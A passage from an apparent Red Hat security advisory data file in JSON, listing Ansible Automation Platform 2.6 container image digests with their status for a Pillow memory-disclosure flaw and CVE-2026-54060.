"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "Pillow: Pillow: Memory disclosure or denial of service via crafted McIdas AREA image"
},
{
"cve": "CVE-2026-54060",
"cwe": {
"id": "CWE-1050",
"name": "Excessive Platform Resource Consumption within a Loop"
},
"discovery_date": "2026-07-06T20:02:29.509113+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
